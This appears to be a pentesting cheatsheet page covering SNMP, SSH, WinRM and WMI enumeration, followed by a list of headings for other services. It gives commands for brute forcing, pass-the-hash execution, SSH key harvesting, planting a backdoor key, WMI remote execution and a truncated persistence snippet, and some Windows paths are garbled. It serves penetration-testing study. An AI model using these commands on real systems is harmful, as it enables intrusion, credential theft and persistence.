nmap -sU -p 161 --script snmp-info <ip>

Community String Brute Force

# onesixtyone (fast UDP brute)
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <ip>
onesixtyone -c community.txt -i ips.txt

# Nmap
nmap -sU -p 161 --script snmp-brute <ip>
nmap -sU -p 161 --script snmp-brute \
  --script-args snmp-brute.communitiesdb=communities.txt <ip>

# Metasploit
use auxiliary/scanner/snmp/snmp_login
set RHOSTS <ip>
run

snmpwalk — Walking the MIB Tree

# Full walk (v1/v2c)
snmpwalk -v1 -c public <ip>
snmpwalk -v2c -c public <ip>

# Target specific OIDs
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.1         # System info
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.4.2    # Running processes
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.6.3    # Installed software
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.6.13.1.3  # Open TCP ports
snmpwalk -v2c -c public <ip> 1.3.6.1.4.1.77.1.2.25 # Windows user accounts
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.2.2        # Network interfaces

# SNMPv3
snmpwalk -v3 -u <user> -l AuthPriv \
  -a MD5 -A <authpass> -x DES -X <privpass> <ip>

snmpget — Single OID Query

snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.1.0     # sysDescr
snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.5.0     # sysName (hostname)
snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.6.0     # sysLocation

snmp-check

snmp-check <ip>
snmp-check <ip> -c public
snmp-check <ip> -c public -v 2c

braa — Bulk SNMP

braa public@<ip>:.1.3.6.*
braa public@192.168.1.1-254:.1.3.6.1.2.1.1.1.0

Nmap SNMP Scripts

nmap -sU -p 161 --script snmp-info <ip>
nmap -sU -p 161 --script snmp-sysdescr <ip>
nmap -sU -p 161 --script snmp-interfaces <ip>
nmap -sU -p 161 --script snmp-processes <ip>
nmap -sU -p 161 --script snmp-win32-users <ip>
nmap -sU -p 161 --script snmp-win32-services <ip>
nmap -sU -p 161 --script snmp-win32-software <ip>
nmap -sU -p 161 --script snmp-* <ip>

Key OIDs Reference

OID	Description
1.3.6.1.2.1.1.1.0	System description
1.3.6.1.2.1.1.3.0	System uptime
1.3.6.1.2.1.1.5.0	Hostname
1.3.6.1.2.1.1.6.0	System location
1.3.6.1.2.1.25.1.6.0	Running OS processes
1.3.6.1.2.1.25.4.2.1.2	Process names
1.3.6.1.2.1.25.6.3.1.2	Installed packages
1.3.6.1.4.1.77.1.2.25	Windows user accounts
1.3.6.1.2.1.6.13.1.3	TCP open ports
1.3.6.1.2.1.2.2.1.2	Interface names
1.3.6.1.2.1.2.2.1.11	Interface in-packets

Common Community Strings

public     private     manager
community  snmp        cisco
monitor    0           internal

SSH

Mon, 01 Jan 0001 00:00:00 +0000

SSH Enumeration Cheatsheet

Default Port: 22 (TCP)

nc -nv <ip> 22                      # Banner grab
ssh -v <user>@<ip>                  # Verbose handshake output
ssh -V                               # Local SSH client version

# Nmap scripts
nmap -p 22 -sV <ip>
nmap -p 22 --script ssh-hostkey <ip>
nmap -p 22 --script ssh2-enum-algos <ip>
nmap -p 22 --script ssh-auth-methods \
  --script-args ssh.user=<user> <ip>
nmap -p 22 --script sshv1 <ip>      # Check for insecure SSHv1

ssh-audit (Configuration Security Check)

ssh-audit <ip>
ssh-audit <ip> -p 22

# Flags to note:
# [fail] = critical issue
# [warn] = should be fixed
# Lists: KEX, hostkey, encryption, MAC algorithms

User Enumeration

# CVE-2018-15473 (OpenSSH < 7.7 username enumeration)
python3 ssh_user_enum.py --userList users.txt --ip <ip>

# Metasploit
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <ip>
set USER_FILE users.txt
run

Brute Force

# Hydra
hydra -l <user> -P wordlist.txt ssh://<ip>
hydra -L users.txt -P wordlist.txt ssh://<ip>
hydra -l <user> -P wordlist.txt -s 2222 ssh://<ip>    # Custom port

# Medusa
medusa -h <ip> -u <user> -P wordlist.txt -M ssh

# Nmap
nmap -p 22 --script ssh-brute <ip>
nmap -p 22 --script ssh-brute \
  --script-args userdb=users.txt,passdb=pass.txt <ip>

# Metasploit
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <ip>
set USERNAME <user>
set PASS_FILE wordlist.txt
run

Key-Based Attacks

# Connect with private key
ssh -i id_rsa <user>@<ip>
chmod 600 id_rsa && ssh -i id_rsa <user>@<ip>

# Crack passphrase on private key
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=wordlist.txt
hashcat -m 22921 ssh_hash.txt wordlist.txt    # Ed25519
hashcat -m 22911 ssh_hash.txt wordlist.txt    # RSA

# Scan for keys (key harvesting after initial access)
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
find / -name "*.pem" -o -name "*.key" 2>/dev/null

SSH Key Scanning

# Collect host keys
ssh-keyscan <ip>
ssh-keyscan -t rsa,ecdsa,ed25519 <ip>
ssh-keyscan -p 2222 <ip>

# Scan range
ssh-keyscan -f hosts.txt > known_hosts

Interesting Files to Grab Post-Access

~/.ssh/id_rsa                  # Private key
~/.ssh/id_rsa.pub              # Public key
~/.ssh/authorized_keys         # Authorized keys (add yours for persistence)
~/.ssh/known_hosts             # Previous connections (network map)
/etc/ssh/sshd_config           # Server configuration
/etc/ssh/ssh_host_rsa_key      # Host private key

Add Backdoor SSH Key (Post-Exploitation)

# On attacker machine
ssh-keygen -t rsa -b 4096 -f backdoor

# On target (append to authorized_keys)
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Connect back
ssh -i backdoor <user>@<ip>

Common Misconfigurations to Check

PermitRootLogin yes           — Root login allowed
PasswordAuthentication yes    — Passwords accepted (brutable)
PermitEmptyPasswords yes      — Blank passwords allowed
AuthorizedKeysFile .ssh/authorized_keys  — Key auth path
AllowUsers / DenyUsers        — User restrictions
Port 22                       — Non-standard port may indicate stealth

WinRM

Mon, 01 Jan 0001 00:00:00 +0000

WinRM Enumeration Cheatsheet

Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS)

What is WinRM? Windows Remote Management — Microsoft’s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration.

Detection

nmap -p 5985,5986 <ip>
nmap -p 5985,5986 -sV <ip>
curl -s http://<ip>:5985/wsman
curl -sk https://<ip>:5986/wsman

Evil-WinRM

# Password auth (HTTP)
evil-winrm -i <ip> -u <user> -p <pass>

# SSL (HTTPS, port 5986)
evil-winrm -i <ip> -u <user> -p <pass> -S

# Pass-the-Hash (NTLM)
evil-winrm -i <ip> -u <user> -H <nthash>

# With scripts and executables directory
evil-winrm -i <ip> -u <user> -p <pass> \
  -s /path/to/ps1_scripts/ \
  -e /path/to/executables/

# Within evil-winrm shell
menu                          # Show built-in commands
upload /local/file.exe        # Upload file
download C:ile.txt          # Download file
Invoke-Binary /local/exe      # Run local exe in memory
bypass_uac                    # UAC bypass

CrackMapExec

# Test credentials
crackmapexec winrm <ip> -u <user> -p <pass>
crackmapexec winrm 192.168.1.0/24 -u <user> -p <pass>

# Credential spray
crackmapexec winrm <ip> -u users.txt -p <pass>
crackmapexec winrm <ip> -u <user> -p wordlist.txt

# Pass-the-Hash
crackmapexec winrm <ip> -u <user> -H <nthash>

# Execute commands
crackmapexec winrm <ip> -u <user> -p <pass> -x 'whoami'      # CMD
crackmapexec winrm <ip> -u <user> -p <pass> -X 'whoami'      # PowerShell
crackmapexec winrm <ip> -u <user> -p <pass> -X 'Get-Process'

PowerShell / Windows Native

# Test WinRM connectivity
Test-WSMan -ComputerName <ip>
Test-WSMan -ComputerName <ip> -UseSSL

# Interactive remote session
Enter-PSSession -ComputerName <ip> -Credential <user>
Enter-PSSession -ComputerName <ip> -UseSSL -Credential <user>

# Non-interactive / scripted
$cred = Get-Credential
$sess = New-PSSession -ComputerName <ip> -Credential $cred
Invoke-Command -Session $sess -ScriptBlock { whoami; hostname }
Invoke-Command -ComputerName <ip> -Credential $cred -ScriptBlock { ipconfig }

# Copy files over WinRM
Copy-Item -Path C:\localile.exe -Destination C:
emote\ -ToSession $sess
Copy-Item -Path C:
emote\loot.txt -Destination C:\local\ -FromSession $sess

impacket

# winrm_exec (alternative)
python3 winrm_exec.py <domain>/<user>:<pass>@<ip>

Brute Force

crackmapexec winrm <ip> -u <user> -p wordlist.txt
hydra -l <user> -P wordlist.txt <ip> -s 5985 http-post-form \
  "/wsman:Username=^USER^&Password=^PASS^:401"

Common Scenarios

Pwned user is in group:
  "Remote Management Users"  → Can use WinRM
  "Administrators"            → Full access via WinRM

Check group membership:
net localgroup "Remote Management Users"

Key Facts

Requires user to be in Remote Management Users or Administrators group
Can be enabled with: Enable-PSRemoting -Force
Firewall rule: WinRM-HTTP-In-TCP (port 5985)
Often enabled on Domain Controllers and management servers

WMI

Mon, 01 Jan 0001 00:00:00 +0000

WMI Enumeration Cheatsheet

Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535)

What is WMI? Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC.

Detection

nmap -p 135 <ip>
nmap -p 135 -sV <ip>
nmap -p 135 --script msrpc-enum <ip>

impacket — wmiexec.py

# Interactive shell
python3 wmiexec.py <domain>/<user>:<pass>@<ip>

# Single command
python3 wmiexec.py <domain>/<user>:<pass>@<ip> "whoami"
python3 wmiexec.py <domain>/<user>:<pass>@<ip> "ipconfig /all"

# Pass-the-Hash
python3 wmiexec.py -hashes :<nthash> <domain>/<user>@<ip>
python3 wmiexec.py -hashes <lmhash>:<nthash> <domain>/<user>@<ip>

# Without domain (local account)
python3 wmiexec.py ./<user>:<pass>@<ip>

CrackMapExec

crackmapexec wmi <ip> -u <user> -p <pass>
crackmapexec wmi <ip> -u <user> -p <pass> -x 'whoami'
crackmapexec wmi <ip> -u <user> -H <nthash>
crackmapexec wmi 192.168.1.0/24 -u <user> -p <pass>

PowerShell WMI (Local & Remote)

# Local system queries
Get-WmiObject -Class Win32_OperatingSystem
Get-WmiObject -Class Win32_ComputerSystem
Get-WmiObject -Class Win32_Process
Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_Group
Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" }
Get-WmiObject -Class Win32_Product          # Installed software (slow)
Get-WmiObject -Class Win32_LogicalDisk
Get-WmiObject -Class Win32_StartupCommand   # Startup items

# Modern equivalent (CIM)
Get-CimInstance -ClassName Win32_OperatingSystem
Get-CimInstance -ClassName Win32_Process

# Remote queries
$cred = Get-Credential
Get-WmiObject -Class Win32_OperatingSystem -ComputerName <ip> -Credential $cred
Get-WmiObject -Class Win32_Process -ComputerName <ip> -Credential $cred

PowerShell WMI Remote Code Execution

# Execute command via WMI (leaves process behind)
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create `
  -ArgumentList "cmd.exe /c whoami > C:\output.txt" `
  -ComputerName <ip> -Credential $cred

# Check output
Get-WmiObject -Class CIM_DataFile -Filter "Name='C:\output.txt'" `
  -ComputerName <ip> -Credential $cred

wmic (Legacy CLI — Windows)

:: Local
wmic os get Caption,Version,BuildNumber
wmic process list brief
wmic useraccount list brief
wmic group list brief
wmic service where "State='Running'" list brief
wmic product get Name,Version        :: Installed software
wmic startupinfo list full

:: Remote
wmic /node:<ip> /user:<user> /password:<pass> os get Caption
wmic /node:<ip> /user:<user> /password:<pass> process call create "cmd.exe /c whoami > C:\out.txt"
wmic /node:<ip> /user:<user> /password:<pass> useraccount list brief

WQL Queries

# WQL = WMI Query Language (SQL-like)
Get-WmiObject -Query "SELECT * FROM Win32_Process WHERE Name='lsass.exe'"
Get-WmiObject -Query "SELECT * FROM Win32_Service WHERE StartMode='Auto' AND State='Stopped'"
Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE LocalAccount=True"

Metasploit

use exploit/windows/smb/psexec              # Uses WMI/DCOM under the hood
use exploit/windows/local/wmi               # Post-exploitation WMI persistence
use auxiliary/scanner/winrm/winrm_wql       # WQL via WinRM

WMI Persistence (Post-Exploitation)

# Create permanent WMI event subscription (fileless persistence)
$filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{
    Name = "PentestFilter"
    EventNameSpace = "root

Footprinting on d3vilsec

DNS

DNS Enumeration Cheatsheet

Key DNS Record Types

Basic Lookups

Zone Transfer

Subdomain Enumeration

Nmap DNS Scripts

Reverse DNS Lookup

Wordlists (SecLists)

FTP

FTP Enumeration Cheatsheet

Banner Grabbing & Connection

Anonymous Login

FTP Commands (Once Connected)

Nmap FTP Scripts

Brute Force

Bulk Download

Key Vulnerabilities

IMAP POP3

IMAP / POP3 Enumeration Cheatsheet

Banner Grabbing

POP3 Commands (Manual)

IMAP Commands (Manual)

Nmap Scripts

Brute Force

curl Mail Access

IPMI

IPMI Enumeration Cheatsheet

Detection & Version

Nmap Scripts

Metasploit Modules

ipmitool (Direct Interaction)

Hash Cracking (After RAKP Dump)

Default Credentials

Key Vulnerabilities

MSSQL

MSSQL Enumeration Cheatsheet

Discovery & Nmap Scripts

Metasploit Modules

mssqlclient.py (impacket)

Useful SQL Queries

xp_cmdshell (OS Command Execution)

Linked Servers (Lateral Movement)

Brute Force

File Read / Write

MySQL

MySQL Enumeration Cheatsheet

Connection & Banner Grabbing

Nmap Scripts

Enumeration Queries

File Read / Write (Requires FILE Privilege)

Brute Force

User-Defined Functions (UDF) for Privilege Escalation

Common Credentials to Try

Oracle TNS

Oracle TNS Enumeration Cheatsheet

Nmap Scripts

ODAT (Oracle Database Attacking Tool)

sqlplus (Direct Connection)

Common SIDs to Try

Enumeration Queries (Once Connected)

Privilege Escalation via Java

Brute Force

Default Credentials

R Services

R-Services Enumeration Cheatsheet

Detection

rlogin

rsh (Remote Shell)

rexec (Remote Exec)

rpcbind / Portmapper (Port 111)

rwho / ruptime

Trust Files (Critical Targets)

RDP

RDP Enumeration Cheatsheet

Detection & Info Gathering

Check NLA (Network Level Auth)

Password Attacks

Connecting via Linux